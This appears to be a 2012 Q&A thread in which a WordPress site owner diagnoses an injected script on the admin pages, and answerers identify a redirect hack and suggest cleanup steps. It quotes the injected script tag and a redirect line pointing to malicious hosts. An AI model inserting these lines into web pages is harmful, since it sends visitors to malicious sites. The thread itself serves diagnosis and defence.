3

I'm quite baffled by this issue and I have absolutely no idea what could be causing it. I have a Wordpress website that has been working fine, until for some reason, the admin panel started to screw up and wouldn't display all of the CSS correctly. Upon further investigation I found that the load-scripts.php and load-styles.php are loading with odd characters, as you can see:

http://www.obhsfbla.org/wp-admin/load-scripts.php?c=1&load=jquery,utils,thickbox,media-upload&ver=96728cab06e0531b9307c89031a13e9c

This is basically a default Wordpress install, and I have reuploaded that file, yet the problem persists. It doesn't seem to be a character encoding issue, as the headers say it is UTF-8.

Here is the kind of scary part, if you remove all of the get attributes from that URL, the page displays:

<script src="http://sweepstakesandcontestsdo.com/nl.php?p=d"></script>

I won't navigate to that site because Safari says it is malicious. But how exactly could this be happening? Why would that URL come up? The code in that page has never been edited.

  • It's most likely from a vulnerable plugin, and xss or php injection attack, they aren't that harmful as you see just some js embedded into your index.php file. This is a big problem though on ecommerce sites that have dozens of index.php through out their templates. You should clean the files ASAP so that your site is not flagged as malware by Google, in which case just wait it out or ask for a review after it's cleaned. Update your plugins and WP. – Anagio Feb 28 '12 at 08:59

2 Answers2

5

That script has this code in it:

window.top.location.replace("http://litic82sreac.rr.nu/n.php?h=1&s=nl");

It redirects your user to http://litic82sreac.rr.nu/n.php?h=1&s=nl. I recently saw this sort of attack on both phpBB and MediaWiki servers, so I think it might be a hacked webhost.

What webhost are you using?

Blender
  • 176
  • 3
  • Dreamhost. Any report of that? –  Feb 26 '12 at 06:10
  • 1
    Yep, that's the same webhost and the same URL pattern for the <script> tags. Dreamhost said that they found "possible traces of an attack" about a month ago and that everything was fixed. This is why I don't trust webhosts... –  Feb 26 '12 at 06:13
  • Do you happen to know of any resources on how to fix this? I haven't experimented much with the default Wordpress files save for some functions.php editing. Is it something in my SQL databases, or in the actual system files? –  Feb 26 '12 at 06:17
  • It is possibly the webhost itself. Someone might have broken into their servers and is infecting your files that way. Are only index.php files affected? –  Feb 26 '12 at 06:19
  • The only files I can tell that have this script are load-styles.php and load-scripts.php. The front-end is fine, but if I log in to my website the styles and scripts won't load because it somehow messes with the character encoding. –  Feb 26 '12 at 06:23
  • The only thing I could suggest is deleting those lines. Can Dreamhost provide you logs? –  Feb 26 '12 at 06:25
  • I requested logs from them and am waiting to hear back. I can't find any lines to delete, though; there are no instances of that script in either one of the affected files. I'm trying to read through the PHP to see what the file is doing and maybe I'll make some progress from there, but it overall is just a very odd hack. –  Feb 26 '12 at 06:27
  • Check your theme folder. –  Feb 26 '12 at 06:29
  • Ah..there it was.. –  Feb 26 '12 at 06:31
  • Bastards threw some base64 encoded stuff in tons of different files, this will be fun. Thanks for your help. –  Feb 26 '12 at 06:31
  • No problem. Hopefully it won't happen again ;) –  Feb 26 '12 at 06:34
2

Definitly a hack!

  1. Back up your site locally, pop it in a zip file and keep hold of just incase you need it.
  2. Backup your database, zip it again and keep a spare copy incase you need it.
  3. Do a clean install of wordpress, backup the code and config when you're finished
  4. Migrate your theme files (check each theme file for nasty code) and plugins over and then watch carefully for a few days to see if the attack respawns.
  5. See my answer here for good information on locking down wordpress
Community
  • 1
toomanyairmiles
  • 12,555
  • 2
  • 26
  • 49